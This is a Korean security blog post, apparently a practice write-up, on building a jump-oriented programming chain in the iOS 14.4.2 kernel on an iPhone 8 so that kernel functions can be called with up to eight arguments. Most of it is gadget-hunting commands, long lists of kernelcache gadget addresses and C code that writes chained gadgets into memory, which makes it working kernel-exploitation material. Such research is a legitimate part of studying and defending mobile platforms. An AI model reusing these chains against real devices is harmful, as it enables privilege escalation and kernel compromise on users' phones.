{"id":3110,"date":"2025-03-03T20:07:41","date_gmt":"2025-03-03T11:07:41","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3110"},"modified":"2025-03-03T20:07:43","modified_gmt":"2025-03-03T11:07:43","slug":"%ec%8b%a4%ec%8a%b5-%ec%95%84%ec%9d%b4%ed%8f%b08-14-4-2%ec%97%90%ec%84%9c-jop%ec%9d%84-%ed%86%b5%ed%95%b4-%ec%b5%9c%eb%8c%80-8%ea%b0%9c%ec%9d%98-%ec%9d%b8%ec%9e%90%eb%a1%9c-%ec%bb%a4%eb%84%90","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3110","title":{"rendered":"[\uc2e4\uc2b5] \uc544\uc774\ud3f08 14.4.2\uc5d0\uc11c JOP\uc744 \ud1b5\ud574 \ucd5c\ub300 8\uac1c\uc758 \uc778\uc790\ub85c \ucee4\ub110 \ud568\uc218 \ud638\ucd9c\ud574\uc11c 64\ube44\ud2b8 \ub9ac\ud134\uac12 \ubc1b\uc544\uc624\uae30"},"content":{"rendered":"\n

https:\/\/h4ck.kr\/?p=2452<\/a><\/p>\n\n\n\n

\uc774\uc804 \uac8c\uc2dc\uae00\uc744 \ub2e4\uc2dc \ud68c\uc0c1\ud574\ubcf4\uba74, Userspace\uc5d0\uc11c IOConnectTrap6 \ud568\uc218\ub97c \ud638\ucd9c\ud558\uc5ec<\/strong> \ucd5c\ub300 7\uac1c\uc758 \uc778\uc790\ub85c \ucee4\ub110 \ud568\uc218\ub97c \ud638\ucd9c\ud574\ub0bc \uc218 \uc788\uc5c8\ub2e4. \uadf8\ub7ec\ub098 \ubb3c\ub9ac\uba54\ubaa8\ub9ac\ub97c \ub9e4\ud551\ud558\ub294\ub370 \ud544\uc694\ud55c pmap_enter_options_addr \ud568\uc218\ub97c \ud638\ucd9c\ud560\ub824\uace0 \ud560\ub54c 8\uac1c\uc758 \uc778\uc790\ub97c \ud544\uc694\ub85c \ud788\ub294\ub370, \ucd5c\ub300 7\uac1c\uc758 \uc778\uc790\ubc16\uc5d0 \ubabb\ud558\ub294 \ud55c\uacc4\uac00 \uc788\ub2e4.<\/p>\n\n\n\n

\ub530\ub77c\uc11c, bazad\ub2d8\uc758 \ucd5c\ub300 14\uac1c\uc758 \uc778\uc790\ub85c \ucee4\ub110 \ud568\uc218\ub97c \ud638\ucd9c\ud558\ub294 \uac8c\uc2dc\ubb3c<\/a>\uacfc memctl \ud504\ub85c\uc81d\ud2b8<\/a>, meowbrek2<\/a>\uc5d0\uc11c \ud65c\uc6a9\ub41c jop \uac00\uc82f\ub4e4\uc744 \ucc38\uace0\ud558\uc5ec \ucd5c\ub300 8\uac1c\uc758 \uc778\uc790\uc640 \ud568\uaed8 64\ube44\ud2b8 \uac12\uc744 \ub9ac\ud134\ud558\ub3c4\ub85d \ub9cc\ub4e4\uc5b4\ubcfc \uac83\uc774\uace0,<\/p>\n\n\n\n

\ub098\uc911\uc5d0\ub294 \ubb3c\ub9ac\uba54\ubaa8\ub9ac\ub97c \ub9f5\ud551\ud574\uc11c \ucee4\ub110\uc744 R\/W\ud560 \uc218 \uc788\ub294 handoff \uc6d0\ub9ac\ub3c4 \uc54c\uc544\ubcfc \uc608\uc815\uc774\ub2e4.<\/p>\n\n\n\n

\ud504\ub864\ub85c\uadf8\ub85c \uc4f8\ub9cc\ud55c \uc801\ub2f9\ud55c \uac00\uc82f \ucc3e\uae30<\/h2>\n\n\n\n

\ud504\ub864\ub85c\uadf8 \uac00\uc82f \uc0ac\uc6a9\ub420\ub9cc\ud55c \uac00\uc82f\uc740 \uc5ec\ub7ec\uac00\uc9c0\uac00 \uc874\uc7ac\ud558\uc600\ub294\ub370, \uc6b0\uc120\uc740 jtool2\ub85c \ucee4\ub110\uce90\uc2dc\ub97c \uc555\ucd95\ud574\uc81c\ud55c \ub2e4\uc74c, ROPgadget --binary path\/to\/decompressed\/kernelcache --depth 13 **>** kernelcache-gadgets.txt<\/code> \uba85\ub839\uc5b4\uc640 \uac19\uc774 \uac00\uc82f\uc744 \uc218\uc9d1\ud558\uc600\ub2e4. \uc218\uc9d1\ud55c \uac00\uc82f\uc740 kernelcache-gadgets.txt \ud30c\uc77c\ub85c \uc800\uc7a5\ub41c\ub2e4.<\/p>\n\n\n\n

grep 'stp x[^;]*; stp x[^;]*; add[^;]*; mov[^;]*; ldr[^;]*; ldr[^;]*; ldr[^;]*; blr[^;]*; str[^;]*; mov[^;]*; ldp[^;]*; ldp[^;]*; ret' kernelcache-gadgets.txt > prologue.txt\n\n<\/pre>\n\n\n\n
\uc704 \uc815\uaddc\uc2dd\uc744 \uc774\uc6a9\ud558\uc5ec \ud504\ub864\ub85c\uadf8 \uac00\uc82f\uc744 \ucc3e\uc544\ub0c8\ub2e4.<\/p>\n\n\n\n
blr \uba85\ub839\uc5b4\ub97c \ud1b5\ud574 \ub808\uc9c0\uc2a4\ud130\ub97c \uc774\uc6a9\ud558\uc5ec \uac04\uc811\uc801\uc73c\ub85c \uc810\ud504\ud558\uace0 \ubcf5\uadc0\ud558\ub294 \ud504\ub864\ub85c\uadf8\uc5d0 \ub4a4\uc774\uc5b4 \uc2a4\ud0dd \uc815\ub9ac\uae4c\uc9c0\ud574\uc11c \ubcf5\uadc0\ud558\ub294 \uc5d0\ud544\ub85c\uadf8\uae4c\uc9c0 \uc218\ud589\ud558\ub294 \uac00\uc82f\uc744 \ucc3e\uc544\ub0b4\uace0\uc790 \ud558\uc600\ub2e4.<\/p>\n\n\n\n
\uc989, \ud504\ub864\ub85c\uadf8\uc758 stp<\/code>\uc640 ldp<\/code>\ub97c \ud1b5\ud574 \uc2a4\ud0dd\uc5d0 \ub808\uc9c0\uc2a4\ud130\ub97c \uc800\uc7a5\uacfc \ubcf5\uc6d0, ldr<\/code>\uc744 \ud1b5\ud574 \uba54\ubaa8\ub9ac\uc5d0\uc11c \ub370\uc774\ud130\ub97c \ubd88\ub7ec\uc624\uace0, blr<\/code>\uc744 \uc0ac\uc6a9\ud574 \uac04\uc811 \ud568\uc218 \ud638\ucd9c\uc744 \ud560 \uc218 \uc788\uace0, \uc5d0\ud544\ub85c\uadf8\uc640 \ud568\uaed8ret<\/code>\uc73c\ub85c \ubc18\ud658\uae4c\uc9c0 \ud574\uc8fc\ub294 \uac00\uc82f\uc774\ub2e4.<\/p>\n\n\n\n
\uacb0\uacfc\ub294 \ub2e4\uc74c\uacfc \uac19\uc558\ub2e4.<\/p>\n\n\n\n
0xfffffff008bdc680 : stp x20, x19, [sp, #-0x20]! ; stp x29, x30, [sp, #0x10] ; add x29, sp, #0x10 ; mov x19, x1 ; ldr x0, [x0, #0x48] ; ldr x8, [x0] ; ldr x8, [x8, #0x78] ; blr x8 ; str x0, [x19] ; movz w0, #0 ; ldp x29, x30, [sp, #0x10] ; ldp x20, x19, [sp], #0x20 ; ret\n0xfffffff008950158 : stp x20, x19, [sp, #-0x20]! ; stp x29, x30, [sp, #0x10] ; add x29, sp, #0x10 ; mov x19, x1 ; ldr x0, [x0, #0x98] ; ldr x8, [x0] ; ldr x8, [x8, #0x7b8] ; blr x8 ; strb w0, [x19] ; movz w0, #0 ; ldp x29, x30, [sp, #0x10] ; ldp x20, x19, [sp], #0x20 ; ret\n0xfffffff008950124 : stp x20, x19, [sp, #-0x20]! ; stp x29, x30, [sp, #0x10] ; add x29, sp, #0x10 ; mov x19, x1 ; ldr x0, [x0, #0x98] ; ldr x8, [x0] ; ldr x8, [x8, #0x7c0] ; blr x8 ; str x0, [x19] ; movz w0, #0 ; ldp x29, x30, [sp, #0x10] ; ldp x20, x19, [sp], #0x20 ; ret\n0xfffffff00895020c : stp x20, x19, [sp, #-0x20]! ; stp x29, x30, [sp, #0x10] ; add x29, sp, #0x10 ; mov x19, x1 ; ldr x0, [x0, #0x98] ; ldr x8, [x0] ; ldr x8, [x8, #0x7d0] ; blr x8 ; strb w0, [x19] ; movz w0, #0 ; ldp x29, x30, [sp, #0x10] ; ldp x20, x19, [sp], #0x20 ; ret\n0xfffffff00878ec48 : stp x20, x19, [sp, #-0x20]! ; stp x29, x30, [sp, #0x10] ; add x29, sp, #0x10 ; mov x19, x1 ; ldr x0, [x0, #0xd8] ; ldr x8, [x0] ; ldr x8, [x8, #0x540] ; blr x8 ; str w0, [x19] ; movz w0, #0 ; ldp x29, x30, [sp, #0x10] ; ldp x20, x19, [sp], #0x20 ; ret\n0xfffffff008730e0c : stp x20, x19, [sp, #-0x20]! ; stp x29, x30, [sp, #0x10] ; add x29, sp, #0x10 ; mov x19, x1 ; ldr x0, [x0, #0xd8] ; ldr x8, [x0] ; ldr x8, [x8, #0x580] ; blr x8 ; str w0, [x19] ; movz w0, #0 ; ldp x29, x30, [sp, #0x10] ; ldp x20, x19, [sp], #0x20 ; ret\n0xfffffff008730e40 : stp x20, x19, [sp, #-0x20]! ; stp x29, x30, [sp, #0x10] ; add x29, sp, #0x10 ; mov x19, x1 ; ldr x0, [x0, #0xd8] ; ldr x8, [x0] ; ldr x8, [x8, #0x588] ; blr x8 ; str w0, [x19] ; movz w0, #0 ; ldp x29, x30, [sp, #0x10] ; ldp x20, x19, [sp], #0x20 ; ret\n<\/pre>\n\n\n\n
\uc704 \uac00\uc82f\ub4e4 \uc911 \ub098\ub294 \ub2e4\uc74c \uac00\uc82f\uc744 \uc120\ud0dd\ud558\uc600\ub2e4.<\/p>\n\n\n\n
0xfffffff008950124 : \nstp x20, x19, [sp, #-0x20]! ; \nstp x29, x30, [sp, #0x10] ; \nadd x29, sp, #0x10 ; \nmov x19, x1 ; \nldr x0, [x0, #0x98] ; \nldr x8, [x0] ; \nldr x8, [x8, #0x7c0] ; \nblr x8 ; str x0, [x19] ; \nmovz w0, #0 ; \nldp x29, x30, [sp, #0x10] ; \nldp x20, x19, [sp], #0x20 ; \nret\n<\/pre>\n\n\n\n
\uc774\ud6c4 blr x8<\/code> \uc5d0 \uc758\ud5e4 \ud638\ucd9c\ub420 \ud568\uc218 \uc8fc\uc18c\uc778 x8\uc744 \uc9c0\uc815\ud560 populate \ud568\uc218\ub97c \ucc3e\uc544\ubcf4\uc558\ub2e4.<\/p>\n\n\n\n
\uba54\ubaa8\ub9ac \uc8fc\uc18c\ub85c\ubd80\ud130 \ub85c\ub4dc\uc2dc\ucf1c \uac01 \ub808\uc9c0\uc2a4\ud130\ub97c \ucee8\ud2b8\ub864\ud560 \uc218 \uc788\ub294 populate \uac00\uc82f \ucc3e\uae30<\/h2>\n\n\n\n
\uac04\ub2e8\ud558\uac8c \uc544\ub798 \uc5b4\uc148\ube14\ub9ac \uba85\ub839\uc5b4 \ud328\ud134\uc73c\ub85c \uac00\uc82f\uc744 \uc218\uc9d1\ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
ldp \uba85\ub839\uc5b4\ub85c \uc2a4\ud0dd\uc5d0\uc11c \ub808\uc9c0\uc2a4\ud130\ub97c \ubcf5\uc6d0\ud558\uace0, ldr\uc5d0 \uc758\ud574 \uba54\ubaa8\ub9ac\uc5d0\uc11c \uac12\uc744 \ub85c\ub4dc\ud558\uace0, mov\uc5d0 \uc758\ud5e4 \ud2b9\uc815 \ub808\uc9c0\uc2a4\ud130\uc5d0 \uc62e\uae30\uace0, br \uba85\ub839\uc5b4\uc5d0 \uc758\ud574 \ub808\uc9c0\uc2a4\ud130\ub97c \ucc38\uc870\ud558\uc5ec \ubd84\uae30\ud558\ub294 \uac00\uc82f\uc744 \ucc3e\uc544\ub0b8\ub2e4.<\/p>\n\n\n\n
grep 'ldp[^;]*; ldp[^;]*; ldr[^;]*; mov[^;]*; br' kernelcache-gadgets.txt > populate.txt\n<\/pre>\n\n\n\n
\uacb0\uacfc\ub294 \ub2e4\uc74c\uacfc \uac19\uc558\ub2e4.<\/p>\n\n\n\n
0xfffffff007e319dc : adrp x8, #0xfffffff00931a000 ; ldr x8, [x8, #0xd58] ; ldr x1, [x8, #0x48] ; br x1 ; mov x6, x2 ; adrp x8, #0xfffffff00931a000 ; ldr x8, [x8, #0xd58] ; ldr x7, [x8, #0x50] ; ldp x8, x2, [x1] ; ldp x3, x4, [x1, #0x10] ; ldr w5, [x1, #0x20] ; mov x1, x8 ; br x7\n0xfffffff007e319f0 : adrp x8, #0xfffffff00931a000 ; ldr x8, [x8, #0xd58] ; ldr x7, [x8, #0x50] ; ldp x8, x2, [x1] ; ldp x3, x4, [x1, #0x10] ; ldr w5, [x1, #0x20] ; mov x1, x8 ; br x7\n0xfffffff0085dedec : b #0xfffffff0085dedf8 ; cmp w1, #0 ; movz w8, #0x1b ; movz w9, #0x13 ; csel w0, w9, w8, eq ; ret ; ldp x4, x0, [x1] ; ldp x8, x2, [x1, #0x10] ; ldr x3, [x1, #0x20] ; mov x1, x8 ; br x4\n0xfffffff007e319e8 : br x1 ; mov x6, x2 ; adrp x8, #0xfffffff00931a000 ; ldr x8, [x8, #0xd58] ; ldr x7, [x8, #0x50] ; ldp x8, x2, [x1] ; ldp x3, x4, [x1, #0x10] ; ldr w5, [x1, #0x20] ; mov x1, x8 ; br x7\n0xfffffff0085dede8 : cmp w1, #0 ; b #0xfffffff0085dedf8 ; cmp w1, #0 ; movz w8, #0x1b ; movz w9, #0x13 ; csel w0, w9, w8, eq ; ret ; ldp x4, x0, [x1] ; ldp x8, x2, [x1, #0x10] ; ldr x3, [x1, #0x20] ; mov x1, x8 ; br x4\n0xfffffff0085dedf0 : cmp w1, #0 ; movz w8, #0x1b ; movz w9, #0x13 ; csel w0, w9, w8, eq ; ret ; ldp x4, x0, [x1] ; ldp x8, x2, [x1, #0x10] ; ldr x3, [x1, #0x20] ; mov x1, x8 ; br x4\n0xfffffff0085dedf0 : cmp w1, #0 ; movz w8, #0x1b ; movz w9, #0x13 ; csel w0, w9, w8, eq ; ret ; ldp x4, x0, [x1] ; ldp x8, x2, [x1, #0x10] ; ldr x3, [x1, #0x20] ; mov x1, x8 ; br x4 ; movz w0, #0x4841 ; movk w0, #0x424c, lsl #16 ; ret\n0xfffffff0085dedfc : csel w0, w9, w8, eq ; ret ; ldp x4, x0, [x1] ; ldp x8, x2, [x1, #0x10] ; ldr x3, [x1, #0x20] ; mov x1, x8 ; br x4\n0xfffffff0085dedfc : csel w0, w9, w8, eq ; ret ; ldp x4, x0, [x1] ; ldp x8, x2, [x1, #0x10] ; ldr x3, [x1, #0x20] ; mov x1, x8 ; br x4 ; movz w0, #0x4841 ; movk w0, #0x424c, lsl #16 ; ret\n0xfffffff0085dede4 : csel w8, wzr, w8, eq ; cmp w1, #0 ; b #0xfffffff0085dedf8 ; cmp w1, #0 ; movz w8, #0x1b ; movz w9, #0x13 ; csel w0, w9, w8, eq ; ret ; ldp x4, x0, [x1] ; ldp x8, x2, [x1, #0x10] ; ldr x3, [x1, #0x20] ; mov x1, x8 ; br x4\n0xfffffff0085dee04 : ldp x4, x0, [x1] ; ldp x8, x2, [x1, #0x10] ; ldr x3, [x1, #0x20] ; mov x1, x8 ; br x4\n0xfffffff0085dee04 : ldp x4, x0, [x1] ; ldp x8, x2, [x1, #0x10] ; ldr x3, [x1, #0x20] ; mov x1, x8 ; br x4 ; movz w0, #0x4841 ; movk w0, #0x424c, lsl #16 ; ret\n0xfffffff007e319fc : ldp x8, x2, [x1] ; ldp x3, x4, [x1, #0x10] ; ldr w5, [x1, #0x20] ; mov x1, x8 ; br x7\n0xfffffff007e319e4 : ldr x1, [x8, #0x48] ; br x1 ; mov x6, x2 ; adrp x8, #0xfffffff00931a000 ; ldr x8, [x8, #0xd58] ; ldr x7, [x8, #0x50] ; ldp x8, x2, [x1] ; ldp x3, x4, [x1, #0x10] ; ldr w5, [x1, #0x20] ; mov x1, x8 ; br x7\n0xfffffff007e319f8 : ldr x7, [x8, #0x50] ; ldp x8, x2, [x1] ; ldp x3, x4, [x1, #0x10] ; ldr w5, [x1, #0x20] ; mov x1, x8 ; br x7\n0xfffffff007e319e0 : ldr x8, [x8, #0xd58] ; ldr x1, [x8, #0x48] ; br x1 ; mov x6, x2 ; adrp x8, #0xfffffff00931a000 ; ldr x8, [x8, #0xd58] ; ldr x7, [x8, #0x50] ; ldp x8, x2, [x1] ; ldp x3, x4, [x1, #0x10] ; ldr w5, [x1, #0x20] ; mov x1, x8 ; br x7\n0xfffffff007e319f4 : ldr x8, [x8, #0xd58] ; ldr x7, [x8, #0x50] ; ldp x8, x2, [x1] ; ldp x3, x4, [x1, #0x10] ; ldr w5, [x1, #0x20] ; mov x1, x8 ; br x7\n0xfffffff007e319ec : mov x6, x2 ; adrp x8, #0xfffffff00931a000 ; ldr x8, [x8, #0xd58] ; ldr x7, [x8, #0x50] ; ldp x8, x2, [x1] ; ldp x3, x4, [x1, #0x10] ; ldr w5, [x1, #0x20] ; mov x1, x8 ; br x7\n0xfffffff0085dedf4 : movz w8, #0x1b ; movz w9, #0x13 ; csel w0, w9, w8, eq ; ret ; ldp x4, x0, [x1] ; ldp x8, x2, [x1, #0x10] ; ldr x3, [x1, #0x20] ; mov x1, x8 ; br x4\n0xfffffff0085dedf4 : movz w8, #0x1b ; movz w9, #0x13 ; csel w0, w9, w8, eq ; ret ; ldp x4, x0, [x1] ; ldp x8, x2, [x1, #0x10] ; ldr x3, [x1, #0x20] ; mov x1, x8 ; br x4 ; movz w0, #0x4841 ; movk w0, #0x424c, lsl #16 ; ret\n0xfffffff0085dedf8 : movz w9, #0x13 ; csel w0, w9, w8, eq ; ret ; ldp x4, x0, [x1] ; ldp x8, x2, [x1, #0x10] ; ldr x3, [x1, #0x20] ; mov x1, x8 ; br x4\n0xfffffff0085dedf8 : movz w9, #0x13 ; csel w0, w9, w8, eq ; ret ; ldp x4, x0, [x1] ; ldp x8, x2, [x1, #0x10] ; ldr x3, [x1, #0x20] ; mov x1, x8 ; br x4 ; movz w0, #0x4841 ; movk w0, #0x424c, lsl #16 ; ret\n0xfffffff0085dee00 : ret ; ldp x4, x0, [x1] ; ldp x8, x2, [x1, #0x10] ; ldr x3, [x1, #0x20] ; mov x1, x8 ; br x4\n0xfffffff0085dee00 : ret ; ldp x4, x0, [x1] ; ldp x8, x2, [x1, #0x10] ; ldr x3, [x1, #0x20] ; mov x1, x8 ; br x4 ; movz w0, #0x4841 ; movk w0, #0x424c, lsl #16 ; ret\n\n<\/pre>\n\n\n\n
\uc704 \uac00\uc82f\ub4e4 \uc911 \ub098\ub294 \ub2e4\uc74c \uac00\uc82f\uc744 \uc120\ud0dd\ud558\uc600\ub2e4.<\/p>\n\n\n\n
0xfffffff0085dedec\nldp x4, x0, [x1] ; \nldp x8, x2, [x1, #0x10] ; \nldr x3, [x1, #0x20] ; \nmov x1, x8 ; \nbr x4\n<\/pre>\n\n\n\n
x1<\/code>\uc774 \uac00\ub9ac\ud0a4\ub294 \uba54\ubaa8\ub9ac\uc5d0\uc11c \ud568\uc218 \uc8fc\uc18c(x4<\/code>)\uc640 \uc778\uc790(x0<\/code>, x2<\/code>, x8<\/code>)\ub97c \ubd88\ub7ec\uc634<\/strong><\/p>\n\n\n\n
x8<\/code>\uc744 x1<\/code>\ub85c \ubcf5\uc0ac\ud558\uc5ec \uc778\uc790 \uc124\uc815<\/p>\n\n\n\n
br x4<\/code>\ub97c \ud1b5\ud574 \ubd88\ub7ec\uc628 \uc8fc\uc18c\ub85c \uc810\ud504\ud558\uc5ec \ud568\uc218 \ud638\ucd9c<\/strong><\/p>\n\n\n\n
\ub514\uc2a4\ud328\uce58 \uac00\uc82f \uace0\ub974\uae30<\/h1>\n\n\n\n
\ub9e4\ubc88 \ucee4\ub110 \ud568\uc218\ub97c \ud638\ucd9c\ud558\uc5ec jop\uc774 \uc798\ub418\ub294\uc9c0 \ud14c\uc2a4\ud2b8\ud560 \uc21c \uc5c6\uc73c\ub2c8, \uc9c1\uc811 c\uc5b8\uc5b4\uc640 \uc5b4\uc148\ube14\ub9ac \ucf54\ub4dc\ub97c \uc9dc\uc11c \ud14c\uc2a4\ud2b8\ud574\ubcf4\uc558\ub2e4.<\/p>\n\n\n\n
https:\/\/github.com\/wh1te4ever\/jop_practice\/blob\/main\/jop3.c<\/a><\/p>\n\n\n\n
uint64_t call8_jop(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3, uint64_t x4, uint64_t x5, uint64_t x6, uint64_t x7) {\n    write64(my_page, my_page);\n    write64(my_page + 0x98, my_page);\n    write64(my_page + 0x7c0, gadget_populate + 4);\n\n    \/\/gadget_populate + 4 \ud568\uc218\uc5d0\uc11c \uc9c4\uc785\ud588\uc744\ub54c, \ub2e4\uc74c \ub808\uc9c0\uc2a4\ud130 \ucc38\uc870. (\uc8fc\uc11d \ucc38\uace0) \n    \/\/\uc774\ud6c4\uc5d0 br x4 \ubb38\uc740 my_call6\uc758 a5 \ucc38\uc870 (a5 = mov_x15_x2__br_x3)\n    write64(my_page + 0x100, 0);\n    write64(my_page + 0x108, 0);\n    write64(my_page + 0x110, my_page + 0x800);  \/\/x1 = x8\n    write64(my_page + 0x118, x7);               \/\/x2\n    write64(my_page + 0x120, gadget_populate);  \/\/x3\n\n    \/\/mov_x15_x2__br_x3\n    \/\/\uc774\uc81c x15 = x2 (call8_jop's x7)\n    \/\/x3\uc5d0 \uc758\ud574 gadget_populate\uc73c\ub85c \ubd84\uae30;\n\n    \/\/gadget_populate \ud568\uc218 \uc9c4\uc785, \ub2e4\uc74c \ub808\uc9c0\uc2a4\ud130 \ucc38\uc870. (\uc8fc\uc11d \ucc38\uace0) \n    \/\/\uc774\ud6c4\uc5d0 br x4 \ubb38\uc740 mov_x12_x0__br_x2\uc73c\ub85c \ubd84\uae30\n    uint64_t current_page = my_page + 0x800;\n    write64(current_page, mov_x12_x0__br_x2);   \/\/x4\n    write64(current_page + 0x8, gadget_populate);                    \/\/x0\n    write64(current_page + 0x10, current_page + 0x40);      \/\/x1 = x8\n    write64(current_page + 0x18, gadget_populate);      \/\/x2\n    write64(current_page + 0x20, 0);      \/\/x3\n<\/pre>\n\n\n\n
\uc5ec\uae30\uae4c\uc9c0 \uc218\ud589\ud574\ubd24\uc744\ub54c, \uac01 \ud398\uc774\uc9c0 0x100~0x120\u2026 +0x8~0x20\uae4c\uc9c0 \ub9e4\ubc88 5\ubc88\uc758 \uba54\ubaa8\ub9ac\ub97c write\ud560\ub54c\ub9c8\ub2e4 \ub514\uc2a4\ud328\uce58 \uac00\uc82f\uc73c\ub85c \ubd84\uae30\uc2dc\ud0ac \uc218 \uc788\ub294 x4 \ub808\uc9c0\uc2a4\ud130, \ub514\uc2a4\ud328\uce58 \uac00\uc82f\uc774 \ub05d\ub09c\ub4a4 \uadf8 \ub2e4\uc74c \uac00\uc82f\uc73c\ub85c \ud638\ucd9c\ud558\uac8c \ub9cc\ub4dc\ub294 x1 = x8 \ub808\uc9c0\uc2a4\ud130, \uc784\uc758\uc758 x0, x2, x3 \ub808\uc9c0\uc2a4\ud130 \uac12\uc744 \uc9c0\uc815\ud574 \ub2e4\ub978 \ub808\uc9c0\uc2a4\ud130\ub85c \uac12\uc744 \uc9c0\uc815\ud574\uc904 \uc218 \uc788\uac8c \ub514\uc2a4\ud328\uce58 \uac00\uc82f\uacfc \uccb4\uc778\u2026 \uc774\ub807\uac8c \uc124\uba85\ud560 \uc218 \uc788\uc744 \uac83 \uac19\ub2e4.<\/p>\n\n\n\n
x2, x3\ub294 \ub9e4\ubc88 populate \uac00\uc82f\uc744 \ud638\ucd9c\ud560\ub54c\ub9c8\ub2e4 \uc784\uc758\ub85c \uc9c0\uc815\ud574 \uc904 \uc218 \uc788\uc73c\ub2c8, br x2, br x3\ub85c populate \uac00\uc82f\uc744 \ubcf5\uadc0\ud560 \uc218 \uc788\uc73c\uba74\uc11c \ud2b9\uc815 \ub808\uc9c0\uc2a4\ud130 \uac12\uc744 \uc62e\uae38 \uc218 \uc788\ub294 \ub808\uc9c0\uc2a4\ud130\ub97c \ucc3e\uc544\ubcf4\uc558\ub2e4.<\/p>\n\n\n\n
mov x0, x1 ; br x2 \nmov x0, x8 ; br x2\nmov x0, x9 ; br x2\nmov x1, x14 ; br x2\nmov x1, x16 ; br x2\nmov x1, x8 ; br x2 \nmov x10, x0 ; br x2 \nmov x12, x0 ; br x2 \nmov x14, x1 ; br x2 \nmov x16, x1 ; br x2 \nmov x17, x16 ; br x2\n\nmov x0, x8 ; br x3\nmov x1, x0 ; br x3\nmov x1, x2 ; br x3\nmov x1, x8 ; br x3\nmov x1, x9 ; br x3\nmov x15, x2 ; br x3 \nmov x16, x11 ; br x3\nmov x16, x14 ; br x3\nmov x2, x1 ; br x3\nmov x2, x15 ; br x3 \nmov x2, x8 ; br x3\n<\/pre>\n\n\n\n
mov x10, x0 ; br x2<\/code><\/p>\n\n\n\n
mov x12, x0 ; br x2<\/code><\/p>\n\n\n\n
x0\ub808\uc9c0\uc2a4\ud130\ub97c \ubcf5\uc0ac\ud558\uc5ec \uc784\uc758\uc758 x10 \ub610\ub294 x12 \ub808\uc9c0\uc2a4\ud130\ub97c \uc9c0\uc815\ud574\uc904 \uc218 \uc788\uae30\uc5d0 \uc704 \uac00\uc82f\uc744 \ud0dd\ud558\uae30\ub85c \ud558\uc600\ub2e4.<\/p>\n\n\n\n
\uc774\uc81c x10 \ub808\uc9c0\uc2a4\ud130\uc640 x12 \ub808\uc9c0\uc2a4\ud130\ub97c populate \uc8fc\uc18c\ub85c \uc9c0\uc815\ud558\uace0,<\/p>\n\n\n\n
br x10, br x12\ub97c \ud1b5\ud574 populate \uc8fc\uc18c\ub85c \ubcf5\uadc0\ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
   \/\/gadget_populate \ud568\uc218 \uc9c4\uc785, \ub2e4\uc74c \ub808\uc9c0\uc2a4\ud130 \ucc38\uc870. (\uc8fc\uc11d \ucc38\uace0) \n    \/\/\uc774\ud6c4\uc5d0 br x4 \ubb38\uc740 mov_x12_x0__br_x2\uc73c\ub85c \ubd84\uae30\n    uint64_t current_page = my_page + 0x800;\n    write64(current_page, mov_x12_x0__br_x2);   \/\/x4\n    write64(current_page + 0x8, gadget_populate);                    \/\/x0\n    write64(current_page + 0x10, current_page + 0x40);      \/\/x1 = x8\n    write64(current_page + 0x18, gadget_populate);      \/\/x2\n    write64(current_page + 0x20, 0);      \/\/x3\n\n    \/\/mov_x12_x0__br_x2\n    \/\/x12\uc5d0 gadget_populate \uc8fc\uc18c \ubc31\uc5c5 \ud6c4 populate \ubcf5\uadc0.\n\n    \/\/gadget_populate \ud568\uc218 \uc9c4\uc785, \ub2e4\uc74c \ub808\uc9c0\uc2a4\ud130 \ucc38\uc870. (\uc8fc\uc11d \ucc38\uace0) \n    \/\/\uc774\ud6c4\uc5d0 br x4 \ubb38\uc740 mov_x10_x0__br_x2\uc73c\ub85c \ubd84\uae30\n    current_page += 0x40;\n    write64(current_page, mov_x10_x0__br_x2);   \/\/x4\n    write64(current_page + 0x8, gadget_populate);           \/\/x0\n    write64(current_page + 0x10, current_page + 0x40);      \/\/x1 = x8\n    write64(current_page + 0x18, gadget_populate);      \/\/x2\n    write64(current_page + 0x20, 0);      \/\/x3\n\n    \/\/mov_x10_x0__br_x2\n    \/\/x10\uc5d0 gadget_populate \uc8fc\uc18c \ubc31\uc5c5 \ud6c4 populate \ubcf5\uadc0. \n<\/pre>\n\n\n\n
\uc704 \ucf54\ub4dc\ub97c \uc2e4\ud589\ud558\uba74\uc11c, \ub5a0\uc624\ub978 \uc0dd\uac01\uc740 \uc774\uc81c \uc5b4\ub5bb\uac8c \ud558\uba74 x7 \ub808\uc9c0\uc2a4\ud130\uc5d0 jop\u2019s x7\uc774 \ub4e4\uc5b4\uac08 \uc218 \uc788\ub290\ub0d0\uc774\ub2e4.<\/p>\n\n\n\n
\uc6b0\uc120\uc740 mov_x15_x2__br_x3\uc73c\ub85c \uc704 \ucf54\ub4dc\ub97c \uc2e4\ud589\ud558\uae30 \uc804\uc5d0 x2\uac12\uc5d0 jop\u2019s x7\uc73c\ub85c \uc9c0\uc815\ud574\ub193\uc74c\uc73c\ub85c\uc368, x15\ub808\uc9c0\uc2a4\ud130\uc5d0 \ubc31\uc5c5\ud55c\ub2e4.<\/p>\n\n\n\n
write64(my_page + 0x100, 0);\n    write64(my_page + 0x108, 0);\n    write64(my_page + 0x110, my_page + 0x800);  \/\/x1 = x8\n    write64(my_page + 0x118, x7);               \/\/x2\n    write64(my_page + 0x120, gadget_populate);  \/\/x3\n<\/pre>\n\n\n\n
\uadf8 \ub2e4\uc74c\uc73c\ub85c, x12, x10 \ub808\uc9c0\uc2a4\ud130\uc5d0 populate \uc8fc\uc18c\ub85c \ubc31\uc5c5\ud574\ub193\uace0,<\/p>\n\n\n\n
jop\u2019s x7\uc774 \ubc31\uc5c5\ub41c x15 \ub808\uc9c0\uc2a4\ud130\ub97c x16\uc5d0 \ubcf5\uc0ac\ud558\uace0, x12\uc5d0 \uc758\ud574 populate\uc73c\ub85c \ubcf5\uadc0.<\/p>\n\n\n\n
\/\/gadget_populate \ud568\uc218 \uc9c4\uc785, \ub2e4\uc74c \ub808\uc9c0\uc2a4\ud130 \ucc38\uc870. (\uc8fc\uc11d \ucc38\uace0) \n    \/\/\uc774\ud6c4\uc5d0 br x4 \ubb38\uc740 mov_x16_x15__br_x12\uc73c\ub85c \ubd84\uae30\n    current_page += 0x40; \n    write64(current_page, mov_x16_x15__br_x12);   \/\/x4\n    write64(current_page + 0x8, gadget_populate);           \/\/x0\n    write64(current_page + 0x10, current_page + 0x40);      \/\/x1 = x8\n    write64(current_page + 0x18, gadget_populate);      \/\/x2\n    write64(current_page + 0x20, 0);      \/\/x3\n<\/pre>\n\n\n\n
